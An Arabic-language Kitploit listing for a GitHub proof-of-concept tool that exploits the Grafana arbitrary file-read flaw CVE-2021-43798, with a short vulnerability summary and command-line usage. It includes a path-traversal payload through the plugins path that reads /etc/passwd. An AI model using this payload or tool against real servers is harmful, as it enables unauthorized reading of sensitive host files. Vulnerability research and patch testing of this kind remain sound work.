Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-43798-grafana_fileread — grafana CVE-2021-43798 POC لثغرة قراءة الملفات التعسفية، يستخدم طريقة الكشف الدوري عبر عدة إضافات، ويسمح بتحديد عنوان URL واحد أو قراءة عناوين URL من ملف. | Kitploit
أدوات/GitHubGitHub/moch3n/cve-2021-43798-grafana_fileread
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubmoch3n/cve-2021-43798-grafana_fileread

CVE-2021-43798-grafana_fileread

grafana CVE-2021-43798 POC لثغرة قراءة الملفات التعسفية، يستخدم طريقة الكشف الدوري عبر عدة إضافات، ويسمح بتحديد عنوان URL واحد أو قراءة عناوين URL من ملف.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
171منذ 4 سنواتلم تتم المراجعة بعد

CVE-2021-43798-grafana_fileread

إذا تمت معالجة الهدف عبر وكيل عكسي، يمكن استبدال الحمولة بهذه:

root@kitploit:~
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"

Grafana هو منصة ويب مفتوحة المصدر وعبر الأنظمة لعرض البيانات وتصورها. بعد أن يقوم المستخدم بتكوين مصدر بيانات متصل، يمكن لـ Grafana عرض الرسوم البيانية والتنبيهات في متصفح الويب.
يوجد في Grafana ثغرة أمنية تسمح بقراءة الملفات العشوائية دون تفويض، حيث يمكن للمهاجم دون الحاجة إلى مصادقة استغلال هذه الثغرة لقراءة أي ملف على المضيف.

CVE: CVE-2021-43798
المكون: Grafana نوع الثغرة: قراءة الملفات
التأثير: الحصول على معلومات حساسة
الوصف المختصر: يمكن للمهاجم غير المصرح له استغلال هذه الثغرة للحصول على ملفات حساسة من الخادم

تعليمات الاستخدام

1、فحص عنوان URL واحد

root@kitploit:~
python3 grafana_fileread.py -u http://localhost:3000

image يمكن عرض البيانات التي تم الحصول عليها في ملف grafana 8.x_fileread_vuln.txt image 2、فحص عناوين IP داخل ملف

root@kitploit:~
python3 grafana_fileread.py -f http://localhost:3000

image

3、-h لعرض المساعدة image

تنزيل الأداة